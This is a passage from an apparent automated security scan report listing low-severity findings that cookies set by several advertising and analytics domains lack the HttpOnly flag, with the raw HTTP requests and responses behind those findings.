Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%266073%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2100=usr3fe3ac8db403a568; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

9.50. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%265852%3D1%267727%3D1; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.pixel.rubiconproject.com
put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.51. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.pixel.rubiconproject.com
put_1185=2863298321806118365; expires=Sun, 06-Nov-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.52. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.pixel.rubiconproject.com
put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Sat, 17-Sep-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.53. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266286%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266286%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
put_2132=439524AE8C6B634E021F5F7802166020; expires=Thu, 06-Sep-2012 14:14:25 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.54. http://pluck.abc.net.au/ver1.0/daapi2.api previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pluck.abc.net.au
Path:	/ver1.0/daapi2.api

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&cb=PluckSDK.jsonpcb('request_0') HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:19:04 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:58 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:58 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 663
Date: Wed, 07 Sep 2011 14:14:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:58 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:19 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:15:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 661
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:19 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

9.58. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:49 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023677.799695.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 548
Date: Wed, 07 Sep 2011 14:14:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:49 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script language="JavaScript" type="text\/javascript">document.write(\'<script language="JavaScript" src="http:\/\/optimized-by.rubiconproject.com\/a\/dk.js?defaulting_ad=i3333333136
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:35 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023906.799696.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:35 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 679
Date: Wed, 07 Sep 2011 14:14:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:35 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('\r\n<script language="javascript" type="text\/javascript">\r\n var dkcb = Math.random();\r\n document.write(
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:31 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023906.799696.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:15:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 679
Date: Wed, 07 Sep 2011 14:15:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:31 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('\r\n<script language="javascript" type="text\/javascript">\r\n var dkcb = Math.random();\r\n document.write(
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:10 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1069538.801645.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 995
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:10 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019757/direct/01/7542530158?click=http://r1-ads.ace.advertising.com/click/site=0000801645/mnum=0001069538/cstr=18256183=_4e677c31,754253
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:13 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.905406.801647.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 898
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:13 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script type="text/javascript">document.write(\'<ifr\'+\'ame width="300" height="250" src="http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=
...[SNIP]...

9.63. http://rc.d.chango.com/m/rc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rc.d.chango.com
Path:	/m/rc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Sat, 04 Sep 2021 14:14:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.64. http://rp.gwallet.com/r1/ruum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rp.gwallet.com
Path:	/r1/ruum

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ra1_uid=4711648038188259648; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/; Domain=gwallet.com; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.65. http://statse.webtrendslive.com/dcsfoa7no000004nwf1r8lgm7_4i7i/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcsfoa7no000004nwf1r8lgm7_4i7i/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAQAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOCwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAAA3fGdON3xnTgAAAAA-; path=/; expires=Sat, 04-Sep-2021 14:14:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsfoa7no000004nwf1r8lgm7_4i7i/dcs.gif?&dcsdat=1315422868900&dcssip=www.abc.net.au&dcsuri=/perth/news/&dcsref=http://www.google.com/search%3Fsourceid=chrome%26ie=UTF-8%26q=perth%2Bnews&WT.co_f=50.23.123.106-4086325760.30173190&WT.vtid=50.23.123.106-4086325760.30173190&WT.vtvs=1315422868902&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=14&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Perth%20News%20-%20ABC%20Perth%20-%20Australian%20Broadcasting%20Corporation&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1266x909&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.abc.net.au/perth/news/&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&LocalRegion=ABC%20Perth&meta_dc.type=collection&WT.z_dcsid=dcsfoa7no000004nwf1r8lgm7_4i7i HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAPAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOCgAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Sep 2011 14:14:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAQAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOCwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAAA3fGdON3xnTgAAAAA-; path=/; expires=Sat, 04-Sep-2021 14:14:15 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

9.66. http://statse.webtrendslive.com/dcsw4t3cy00000ctu0wdzjrq1_3q8k/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
